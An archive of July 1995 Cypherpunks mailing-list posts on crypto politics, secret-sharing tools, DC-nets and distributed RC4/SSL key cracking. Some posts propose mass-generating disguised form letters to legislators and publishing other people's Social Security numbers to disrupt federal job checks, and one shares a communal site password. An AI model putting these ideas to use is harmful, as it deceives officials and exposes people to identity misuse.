From: tcmay@sensemedia.net (Timothy C. May)
Date: Mon, 17 Jul 95 09:05:25 PDT
To: CYPHERPUNKS@toad.com
Subject: Automated Rant Generators and Letter Generators
Message-ID: <ac2fd6eb19021004056b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:35 AM 7/17/95, Martin Hamilton wrote:
>MONTY HARDER writes:
>
>| Anyone who has read MAD Magazine could put such together. As an added
>| bonus, use variable margin settings, and none of the letters would be
>| exactly the same. Appropriate Imail => FAX software on a puter in DC
>| (local call that way) with the phone number of the sender filled in on
>| the top line for ID (izzat legal?) so it doesn't look like a form letter
>| at all.
>
>Plus - choose the fonts & point sizes at random too ? :-)

Yes, make your letters to Congressmen look like ransom notes...it really
gets their attention!

Seriously, I have no doubt that the next generation of "direct mail" will
be geared toward automatic generation of personalized letters, using
various natural language parser generators (a la the "rant generator" many
of us have used), variable fonts and margins, and so on.

This will further "flood the channel" and will ultimately make letter
writing mostly meaningless. IN my case, I skip most letters to the
editor--at least for local newspapers and weeklies--as they look to be
automatically written ("I am outraged at your article about converting
Lighthouse Point into a nuclear-powered whale-packing plant...").

Cypherpunks could probably have an effect on hastening this "denial of
service" attack on the efficacy of letter-writing by releasing an
easy-to-use package that does all this letter writing at the click of a
button....just type in some key words, for the topics, and it does the
rest.

An interesting project, actually.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joelm@eskimo.com (Joel McNamara)
Date: Mon, 17 Jul 95 09:39:26 PDT
To: cypherpunks@toad.com
Subject: Windows secret-sharing
Message-ID: <199507171638.JAA14534@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


I just uploaded a user-friendly, Windows front-end to Hal Finney's SECSPLIT.EXE (based on Shamir's secret-sharing) called Secret Sharer.  The interface supports splitting and restoring files or passphrases.

Nothing fancy, but a simple solution for Windows users who want to do their own key (or whatever) escrow.

Secret Sharer is freeware, and is available from either:

http://www.eskimo.com/~joelm
ftp.eskimo.com /joelm/secshare.zip

I'm probably being over-cautious, but because of ITAR, SECSPLIT.EXE is not included in the ZIP file.  FTP sites for downloading are listed in the docs though.

Comments, bug reports, etc. appreciated before I announce to the relevant newsgroups.

Joel McNamara
joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 17 Jul 95 07:42:11 PDT
To: cypherpunks@toad.com
Subject: Proposed SS#/Federal Job Licensing DOS Attack
Message-ID: <199507171441.KAA02622@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On another subject entirely...

I have naturally been concerned about the Feds' proposal to set up
a national job licensing system.  In order to protect us from
hordes of illegals, they have suggested that employers be required
to check SS#-True Name matches before employment could begin.

This amounts to requiring federal permission for the 55 million 
annual job changes.  Initially, it is supposed to be restricted to
checking SS# validity, name match, and non multiple use.  Later (as with
driver's licenses) they will add restrictions having to do with tax
compliance, child support compliance, library fine compliance, etc.
After all, we wouldn't want tax evading, deadbeat dad, library
scofflaws working in Amerika, would we?

This suggests am interesting Denial of Service (DOS) attack.  If
you published your own or others' SS#-True Name pairs on a public
forum (currently completely legal BTW), multiple use could be 
encouraged, the TrueNames would become unemployable, and interesting
litigation would result.  If done enough, systemic breakdown would
occur.

I am anxious to see the regs (they are just at the talking stage) to
see how they handle "exceptions" like thus.

DCF

"Who in spite of the fact that he has changed jobs since November 1986, has
yet to fill out an I-9 form.  He *loves* contract employment." 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dursi@lola.phy.QueensU.CA (Jonathan Dursi)
Date: Mon, 17 Jul 95 08:00:43 PDT
To: cypherpunks@toad.com
Subject: Re: Free The World Web Server project.. :)
Message-ID: <9507171456.AA16986@duke>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> >  Expecially if the form letter generated would be randomly selected
> >from parallel word streams.  For example:
> [...]
> >  You get the idea.

> Rather than spend five minutes writing something on your own you'd end
> up something that looks totally fake.  I believe that what is going on
> would be discerned by a staffer in moments. 

Well, it would be just as easy (although, admittedly, somewhat less
convenient to the users) to have the web page such that the users could
type in the letter, with some ``suggested text'' (perhaps randomly 
generated as above), perhaps even as the default; then it's just a matter
of editing a few sentances, and maybe adding a paragraph or two...  then
click, and it's off.

It wouldn't be as convenient as just-click-and-a-letter-will-be-sent,
but it's still more convenient than having to write the letter yourself,
which means that it'll generate more traffic...

	- Jonathan
- ---
Jonathan Dursi               |  "Never attribute to malice 
dursi@astro.queensu.ca       |   what can adequately be explained 
                             |   by stupidity."  - Hanlon's Razor

-----BEGIN PGP SIGNATURE-----
Version: 2.6.i

iQBVAgUBMAp5/BJH45PFiKyNAQGYJQH/Uo3k45i73U8qQA1/y5LeXPso07LAPCwo
5i0xkFudoK2/Q5H7Gm7xmygNXIkckhuK/X/kJvdCf2khRluP8y/c7w==
=jwye
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Mon, 17 Jul 95 08:09:20 PDT
To: bdavis@thepoint.net
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <Pine.D-G.3.91.950716003841.26405B-100000@dg.thepoint.net>
Message-ID: <9507171457.AA09146@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Sun, 16 Jul 1995 00:41:03 -0400 (EDT)
>From: Brian Davis <bdavis@thepoint.net>
>
>On Fri, 14 Jul 1995, Carl Ellison wrote:
>...
>>   The last
>> $9M (I believe it was) went to buying up AT&T DES phones to be made into
>> Clipper phones.  Of course, the conversion hasn't happened yet and the DES
>> phones are sitting in a warehouse someplace -- but the $9M fund went to
>		^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>Nope.  There is one right here in my office.  And it makes me feel so 
>safe and secure.

The $9M didn't buy *all* of the AT&T phones.  TIS has 2 of them.  Bruce
Schneier has 1.  Whit Diffie has one that I've seen.

However, all the ones it did buy are apparently in a warehouse, gathering
dust.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 17 Jul 95 08:39:14 PDT
To: jim@acm.org
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <199507171504.LAA07652@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:18 AM 7/15/95 PDT, Jim Gillogly wrote:
>
>> silly@ugcs.caltech.edu ((me)) writes:
>> Help!   What does GAK stand for?  I've seen it a billion times,
>
>Government Access to Keys; also seen as GACK (Crypto Keys).  This is more
>descriptive and accurate than calling it Key Escrow, since escrow is for
>the benefit of the parties involved in a transaction. 

Or we might use Sandy Sandfort's suggestion "key forfeiture" derived from asset forfeiture.

DCF

"Isn't it peculiar how nature doth contrive that every boy and every girl who's born into this world alive is either a little libertarian or else a little goddamn fascist bastard." -- Just getting it out of my system before Exon.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Mon, 17 Jul 95 10:29:23 PDT
To: futplex@pseudonym.com
Subject: Re: bi-directional dining cryptographers
In-Reply-To: <9507171256.AA20139@cs.umass.edu>
Message-ID: <199507171724.AA15346@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


I'm rereading my mail at once; I've forgotten if I told you this
already.

Anyway, I just presupposed the same protocol outlined by Chaum in
his paper. It's disruptable, but so's any DC-net to begin with.

DC-nets presuppose a fair amount of co-operation between their
participants.

I'd also like to point out that this system indicates that during
an attack/disruption on a traditional dc-net, the disruptor can 
tell what the original person was trying to send, even though noone
else can.

And then perhaps XOR the data with something offensive, and if the
original sender tries to re-send, broadcast the result of the XOR,
resulting in a total net output of the offensive material.

I'm sure someone's going to try that sooner or later.

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Mon, 17 Jul 95 12:31:29 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Automated Rant Generators and Letter Generators
In-Reply-To: <ac2fd6eb19021004056b@[205.199.118.202]>
Message-ID: <199507171929.MAA18513@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Cypherpunks could probably have an effect on hastening this "denial of
> service" attack on the efficacy of letter-writing by releasing an
> easy-to-use package that does all this letter writing at the click of a
> button....just type in some key words, for the topics, and it does the
> rest.
> 
> An interesting project, actually.
> 
> --Tim May
> 
    A final step might be to interface the output to old pen plotters
    like my HP7470A with an ascii-to-handwriting program.  Akin to
    the White House souvenir signature generator, but with a set of
    parameters to mimic different "hands".  Knuth's Metafont tricks 
    come to mind. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Mon, 17 Jul 95 13:05:07 PDT
To: cypherpunks@toad.com
Subject: Re: "Judgement Proof" and Putting Up or Shutting Up
In-Reply-To: <9507171938.AA03018@mondo.ab.com>
Message-ID: <199507172003.NAA22114@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



> What's CFR?

I'll take a wild guess and say the Council on Foreign Relations or 
some such thing.  If memory serves me correctly, David Sternlight
is a member.

BTW, I'm back on the list after a few months of working on a 
project.  Did I miss anything interesting?  PGP hasn't been
broken in some trivial fashion, I hope. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Mon, 17 Jul 95 12:08:54 PDT
To: wb8foz@nrk.com
Subject: Re: TIME pathfinder registration
In-Reply-To: <m0sXxKb-0005BTC@nrk.com>
Message-ID: <199507171908.NAA23963@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain



> I note someone has used "cypherpunks" as a login for TIME Mag's
> WWW service.
> 
> I'd guess it was in the spirit of other such enrollments.
> If so, what's the password?

This was me. The password is "writecode", since Pathfinder didn't allow
the login and password to be the same.

                              -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Mon, 17 Jul 95 11:37:15 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: RC4 crack
Message-ID: <Pine.ULT.3.91.950717133656.23201A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

So what was the result of the RC4 key cracking thing that happened last 
week?  It's at 100% but that's all it says.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 1.0

iQCVAwUBMAqt9DokqlyVGmCFAQGxTgP/X6Cm7RfWOeWrzI52ws/cibtnZ/jJ6nTV
8MrWam8ZziWmq3fZeovLU/6sz2CAVBN9msqxo3H0AFTRLBrv1ZRuDj1bCzMEcsXW
JSFiUleDUOliF3qGQMTU9PyaekVr8Kc/OdiHcJhWm5xZjbYA+yvrcwUYCUR/vKBw
UPyL29Jx0L4=
=xMlz
-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <Michael@umlaw.demon.co.uk>
Date: Mon, 17 Jul 95 09:26:13 PDT
To: liberty@gate.net
Subject: Re: Root Causes
Message-ID: <2448@umlaw.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


Jim didn't take my Con Law I course.

In message <199507161819.OAA06090@bb.hks.net> Jim Ray writes:
[cuts throughout]
> 
> Amendment IX -- "The enumeration in the Constitution of certain rights
> shall not be construed to deny or disparage others retained by the people."
                                                      ^^^^^^^ 
> [The right to write code was among many rights NOT enumerated.]
> 

Very hard to argue that the right to write code (as opposed to, 
say, the right to write in code) existed in the late 18th 
century; hence it is hard to argue that it could be "retained" 
today.  

Assuming that the ninth amendment has, or could have, teeth, it 
is unlikely to go beyond rights existing or closely analogous to 
those held by "the people" [free white males, more likely] at 
the time of the amendment's ratification.  Just as well if you 
think about it carefully.

-- 
Michael Froomkin                   until Aug 6: michael@umlaw.demon.co.uk
U.Miami School of Law                                     London, England
mfroomki@umiami.ir.miami.edu <-- this will still find me
PO Box 248087 Coral Gables, FL 33124-8087     Rain. Sun. Rain. Sun. Rain.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Mon, 17 Jul 95 10:51:10 PDT
To: cypherpunks@toad.com
Subject: WSJ on remailers...
Message-ID: <ac30554a20021004de28@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



The WSJ has a  article on anonymous remailers buried in the B section. It
is pretty straightforward and ends up quoting some Finnish police officer
saying that they're not going to go raiding remailers on any suspicion.
They'll need a real crime.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Mon, 17 Jul 95 10:18:29 PDT
To: roger@coelacanth.com (Roger Williams)
Subject: Re: speeding detected by civilians
In-Reply-To: <rogerohyxp80a.fsf@sturgeon.coelacanth.com>
Message-ID: <m0sXuVC-0009tMC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> In article <3u4g3t$pn8@nntp.crl.com> Buzz@static.noise.net (Buzz White) writes:
> 
>    >> Vernon Hills, Illinois, a Chicago suburb, has passed legislation allowing 
>    >> citizens to check out radar guns from the local police department to 
>    >> catch speeders in their community. The radar guns are combined with 
>    >> cameras in order to instantaneously capture the car, license number, and the 
>    >> rate of speed. The citizens can check out the units for a week at a time. The 
>    >> police have stated that they, at this time, will use the data to issue 
>    >> warning letters to the violaters.
> 
>    Can they use them to bust COPS that speed?   Heh heh.
> 
> If Vernon Hills has any citizens left with spines, you can bet that
> the local police are going to start to get a couple hundred pictures
> of cop cars per week... Hell, I'll bet that I could take that many
> by *myself* :)

I'm absolutely dying to do that with cops around here (N.VA/Tysons) area...

I got a ticket at 2:30 AM while my car was on cruise at 55MPH, almost
no hills, guy said he 'paced' me for about a mile doing 70 2-3 miles
before he stopped me, yet he was too lazy to use his radar...
I paid $40 and spent a few hours getting an officially certified
speedometer test, etc.

Still trying to go to court: first date was for July 3rd, which they
decided at the last minute to take as vacation, told me to appear
July 5th, when I found out that the continuance was for Aug 9.  (For
a June 5th or so ticket.

After 50 calls to the court house trying to get through, I found out
that the officers don't even have to turn in paperwork unless I don't
pay the bond and then they just turn it in 4-5 days before the court
date.

The parking meter at the courthouse was fraudulent (20 min for my $.25 for
30 min fee), and I've noted numerous speeding and illegal Uturns, parking
in active roadway's without lights, etc. offences by local police...

sdw

> -- 
> Roger Williams  --  Coelacanth Engineering  --  Middleborough, Mass

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Mon, 17 Jul 95 11:11:28 PDT
To: mfroomki@umiami.ir.miami.edu
Subject: Re: Root Causes Roots
Message-ID: <199507171809.OAA76923@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Professor Froomkin writes:

>Jim didn't take my Con Law I course.

True, and from what I hear, I regret not taking it. 

>
>In message <199507161819.OAA06090@bb.hks.net> Jim Ray writes:
>[cuts throughout]
>> 
>> Amendment IX -- "The enumeration in the Constitution of certain rights
>> shall not be construed to deny or disparage others retained by the people."
>                                                      ^^^^^^^ 
>> [The right to write code was among many rights NOT enumerated.]
>> 
>
>Very hard to argue that the right to write code (as opposed to, 
>say, the right to write in code) 

A distinction my feeble mind fails to grasp, as doing the one is required
in order to even make the other possible. [Now all can see why I had 
so much trouble in law school.]

>existed in the late 18th century; 

A short trip to:"CME's cryptography timeline" [Recently suggested 
on this list] and found at URL:

http://www.clark.net/pub/cme/html/timeline.html  

Reveals some interesting code-history.

[In case the good professor or others on the list are without a
SLIP/PPP connection, a not-so-short excerpt from CME's cryptography
timeline follows]:

_____________________________________________________________


- - From David Kahn's ``The Codebreakers'': 

     ``It must be that as soon as a culture has reached a certain level,
probably measured largely by its literacy, cryptography appears
spontaneously -- as its parents, language and writing, probably also 
did. The multiple human needs and desires that demand privacy among 
two or more people in the midst of social life must inevitably lead to
cryptology wherever men thrive and wherever they write. Cultural 
diffusion seems a less likely explanation for its occurrence in so many
areas, many of them distant and isolated.'' [p. 84] 

The invention of cryptography is not limited to either civilians or the 
government. Wherever the need for secrecy is felt, the invention occurs. 
However, over time the quality of the best available system continues to 
improve and those best systems were often invented by civilians.
Again, from David Kahn: 

     ``It was the amateurs of cryptology who created the species. The 
professionals, who almost certainly surpassed them in cryptanalytic 
expertise, concentrated on down-to-earth problems of the systems that 
were then in use but are now outdated.
     The amateurs, unfettered to those realities, soared into the 
empyrean of theory.'' [pp. 125-6] 

In the list to follow (until I learn how to make tables in HTML), each
description starts with (date; civ or govt; source). Sources are 
identified in full at the end. 

      about 1900 BC; civ; Kahn p.71; an Egyptian scribe used non-standard 
hieroglyphs in an inscription. Kahn lists this as the first documented 
example of written cryptography. 

      1500 BC; civ; Kahn p.75; a Mesopotamian tablet contains an enciphered 
formula for the making of glazes for pottery. 

      500-600 BC; civ; Kahn p.77; Hebrew scribes writing down the book of 
Jeremiah used a reversed-alphabet simple substitution cipher known as 
ATBASH. (Jeremiah started dictating to Baruch in 605 BC but the chapters 
containing these bits of cipher are attributed to a source labeled ``C'' 
(believed not to be Baruch) which could be an editor writing after the 
Babylonian exile in 587 BC, someone contemporaneous with Baruch or even 
Jeremiah himself.)
     ATBASH was one of a few Hebrew ciphers of the time. 

      487 BC; govt; Kahn p.82; the Greeks used a device called the 
``skytale'' -- a staff around which a long, thin strip of leather was 
wrapped and written on. The leather was taken off and worn as a belt. 
Presumably, the recipient would have a matching staff and the encrypting 
staff would be left home. 

      50-60 BC; govt; Kahn p.83; Julius Caesar (100-44 BC) used a simple 
substitution with the normal alphabet (just shifting the letters a fixed 
amount) in government communciations. This cipher was less strong than 
ATBASH, by a small amount, but in a day when few people read in the first 
place, it was good enough.

<SNIP! Off to some [slightly] more modern times.>

1564; civ; Kahn p.144(footnote); Bellaso published an autokey cipher 
improving on the work of Cardano who appears to have invented the idea. 

      1623; civ; Bacon; Sir Francis Bacon described a cipher which now 
bears his name -- a biliteral cipher, known today as a 5-bit binary 
encoding. He advanced it as a steganographic device -- by using variation 
in type face to carry each bit of the encoding. 

      1585; civ; Kahn p.146; Blaise de Vigenre wrote a book on ciphers, 
including the first authentic plaintext and ciphertext autokey systems 
(in which previous plaintext or ciphertext letters are used for the 
current letter's key). [Kahn p.147: both of these were forgotten and
re-invented late in the 19th century.] [The autokey idea survives today
in the DES CBC and CFB modes.] 

      1790's; civ/govt; Kahn p.192, Cryptologia v.5 No.4 pp.193-208; Thomas 
Jefferson, possibly aided by Dr. Robert Patterson (a mathematician at U. 
Penn.), invented his wheel cipher. This was re-invented in several forms 
later and used in WW-II by the US Navy as the Strip Cipher, M-138-A. 

      1817; govt; Kahn p.195; Colonel Decius Wadsworth produced a geared 
cipher disk with a different number of letters in the plain and cipher 
alphabets -- resulting in a progressive cipher in which alphabets are used 
irregularly, depending on the plaintext used. 

      1854; civ; Kahn p.198; Charles Wheatstone invented what has become 
known as the Playfair cipher, having been publicized by his friend Lyon 
Playfair. This cipher uses a keyed array of letters to make a digraphic 
cipher which is easy to use in the field. He also re-invented the 
Wadsworth device and is known for that one. 

      1857; civ; Kahn p.202; Admiral Sir Francis Beaufort's cipher (a 
variant of what's called ``Vigenre'') was published by his brother, 
after the admiral's death in the form of a 4x5 inch card. 

      1859; civ; Kahn p.203; Pliny Earle Chase published the first 
description of a fractionating (tomographic) cipher. 

      1854; civ; Cryptologia v.5 No.4 pp.193-208; Charles Babbage seems to 
have re-invented the wheel cipher. 

      1861-1980; civ; Deavours; 
          ``A study of United States patents from the issuance of the 
first cryptographic patent in 1861 through 1980 identified 1,769 
patents which are primarily related to cryptography.'' [p.1] 

      1861; civ/(govt); Kahn p.207; Friedrich W. Kasiski published a book 
giving the first general solution of a polyalphabetic cipher with 
repeating passphrase, thus marking the end of several hundred years of 
strength for the polyalphabetic cipher. 

      1861-5; govt; Kahn p.215; during the Civil War, possibly among other 
ciphers, the Union used substitution of select words followed by word 
columnar-transposition while the Confederacy used Vigenre (the solution 
of which had just been published by Kasiski). 

      1891; govt/(civ); Cryptologia v.5 No.4 pp.193-208; Major Etienne 
Bazeries did his version of the wheel cipher and published the design 
in 1901 after the French Army rejected it. [Even though he was a military 
cryptologist, the fact that he published it leads me to rate this as (civ)
as well as govt.] 
<SNIP>
______________________________________________________________
End of copy from "CME's cryptography timeline." Thanks [and apologies]
to David Kahn, whose 1960s book is well worth buying, even today.
______________________________________________________________

Professor Froomkin continues:

>hence it is hard to argue that it could be "retained" 
>today.  

In view of the foregoing timeline excerpts, I would 
respectfully disagree.

>
>Assuming that the ninth amendment has, or could have, teeth,

[I am certain it _would_, with ballot-access-fairness reform,
but that's a side issue, like abortion, that should *not*
occupy this list. I am, however, quite willing to discuss it
by private e-mail. JMR]

>it 
>is unlikely to go beyond rights existing or closely analogous to 
>those held by "the people" [free white males, more likely] at 
>the time of the amendment's ratification.  Just as well if you 
>think about it carefully.


Careful thought reveals a atrong suspicion that the "3/5ths people" 
[slaves] had more use for crypto at the time than free white males 
did, but I doubt much, if any, evidence of that activity was 
preserved, and I'm sure it was _forcefully_ discouraged if ever
discovered...My point is, slaves, or those who live in fear of 
eventual slavery, for whatever reason, have a strong affinity for 
cryptography. Note, for example, early use [mentioned in the timeline
above] by the Jewish people.
JMR

Regards, Jim Ray
"It is dangerous to be right when the government is wrong." Voltaire


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMAqmcG1lp8bpvW01AQFfHwP6AxRCwCIunx0GDuRkG5EZTjvkdPOIqaJd
SAAdjHI12faTTL965zeNLw1ws/5/d+INC5U+j1i3mtRbBzb3rYZTRxtb3wmze0jR
cQZblne2Q1jt1teH0xghFrrC3iPkIV9ILf5IdRafv1xqx/cv4/fuUpWb/89nCDzC
U/mCFmCWNYE=
=/+5k
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei>
Date: Mon, 17 Jul 95 11:42:51 PDT
To: cypherpunks@toad.com
Subject: Re:  Free The World Web Server project.. :)
Message-ID: <9507171842.AA10254@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> DM> however, would be unobtrusive. A web page that mails a form letter to
> DM> _your_ congressperson's form-letter-readers (ie staff readers) would be
> DM> much better, IMHO.
 
>   Expecially if the form letter generated would be randomly selected
> from parallel word streams.  For example:
 
>        I am <concerned|alarmed|frightened> by the <attacks on privacy
>      rights in|glaring First Amendment violations in|fascist mentality
>      of|ominous provisions of|potential for civil rights infringement
>      by> SB <#BILLNO> <introduced recently| proposed|offered> by Senator
>      <#ORIGINATOR>.....

     This sort of thing bugs me a lot. If your level of passion
on an issue is not enough to send an individually composed letter,
then send a form letter. But don't try to fake out people that
your note is actually individually composed. One of my pet peeves
is junk mail tricked up to look like something else. I expect 
legislators feel the same way, and have a lot of practice 
recognizing it.

     Personally, if I feel strongly about an issue, I call up
the legislators office and give his/her aide a piece of my mind.
I try to be polite, informative, and find an angle of interest
to that particular legislator, no matter how much I may actually 
despise the slimeball (this was tough when talking to Exon's
press secretary).

Peter Trei
trei@acm.org


Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Samuel Kaplin <skaplin@mirage.skypoint.com>
Date: Mon, 17 Jul 95 12:54:28 PDT
To: cypherpunks@toad.com
Subject: Perl Shirts
Message-ID: <Pine.SV4.3.91.950717145151.8449A-100000@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Anyone know when Joel is going to ship the perl shirts?

Thanks,

Sam

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
Comment: PGP Signed with PineSign 1.0

iQCVAwUBMAq/xe5wXwthmZO1AQEeoQP/dnmJNi+yz5HwPVU3BCOlqLWrQlGHIGjW
LcREDkaXaOWIqJB+5wr/Sc59l54niivh+PifgS72kreLgiw+Im1rF0ftAIUa1f9x
2NUvp+v1yMNB20By25jEhZHwGgMo1dKe67xOhOBVukoEhe1VLg4YO9i7XIqPCh0E
WUlLMj38itQ=
=zz5B
-----END PGP SIGNATURE-----
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: klp@noc.cis.umn.edu
Date: Mon, 17 Jul 95 13:05:36 PDT
To: werner@mc.ab.com (tim werner)
Subject: Re: "Judgement Proof" and Putting Up or Shutting Up
In-Reply-To: <9507171938.AA03018@mondo.ab.com>
Message-ID: <300ac24415e4002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


A little birdie told me that tim werner said:
> 
> >Date: Wed, 5 Jul 1995 04:32:41 +0000 (GMT)
> >From: attila <attila@PrimeNet.Com>
> 
> >and, conspiracy theories non-withstanding, we the people do not govern 
> >America --we are only given a short list of politicians who have sold 
> >their soul to CFR's satanist inner circle.
> 
> What's CFR?
> 

Council on Foreign Relations.

Silly me, I thought it was the Tri-Lateral Commission that really steered
the boat, must have been wrong :)


-- 
Kevin Prigge                        |  Holes in whats left of my reason, 
CIS Consultant                      |  holes in the knees of my blues,
Computer & Information Services     |  odds against me been increasin' 
email: klp@cis.umn.edu              |  but I'll pull through...  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Mon, 17 Jul 95 22:06:12 PDT
To: cypherpunks@toad.com
Subject: Re: RC4 crack
Message-ID: <Pine.3.89.9507172242.A3308-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 17 Jul 1995 aba@dcs.exeter.ac.uk wrote:

> The problem with nicing is that most unix schedulers don't seem to
> know what nice means,.. you still get a noticable slow down on
> interactive jobs on SGI boxes even if you've got it npri -h 150, and
> even though the bruterc4 (and the bruteSSL too) have tiny resident
> core sizes).

Nice -19 works great on SunOS, it sits there happily eating up just about
all the unused CPU time and doesn't interfere at all with interactive
use. I guess it's the SYSV (ack) machines that have problems, 'cause the 
scheduler's too sophisticated.

		Mark






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Mon, 17 Jul 95 13:20:04 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: RC4 crack
In-Reply-To: <20156.9507172011@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.ULT.3.91.950717151714.25405B-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 17 Jul 1995 aba@atlas.ex.ac.uk wrote:

> Several folks have various parts of an RC4 SSL bruter (netscape secure
> sockets layer) and are working on sockets based farming tools to allow
> this one to be more automated, as there have been key space management
> problems with the bruterc4 effort.  Also means a better % of idle time
> will be soaked on particpating machines, as we will not need to wait
> for operators to get in the next morning, or rely on people to
> remember which space they have swept to paste back into the confirm
> box.

I remember when RSA129 was being done, the program you have you manually 
get a start location, and then email transparent any results that it 
got.  The program that doled out areas to search would base those on what 
had already been mailed in.  I don't know the details of how exactly that 
worked, however.

But, if the program could be written in such a way that it was all 
automatic, mailing in results and automatically (maybe via a telnet 
port?) getting the information about what to search, that would be most 
nice. 

I'd basicly like to be able to start the program, nice it, slam it in the 
background, and forget about it.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 1.0

iQCVAwUBMArF9DokqlyVGmCFAQGf7gP/QCJFRsBUJ7IRoKzheKeFXvFpjRxeJn11
n8DJbMlMaDoH6AIm49LrHI/fXmdlm8A9hrBMSemD7+HmImxSZmx2InS07eni4Khs
j7Npqen2VTOHfr1RBDqUpzUv4FXVciYVLvQs4gzUhEIOjeN4iVhboUm/pBhaj4s4
3IKPuxIovwQ=
=QR/m
-----END PGP SIGNATURE-----
 
____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
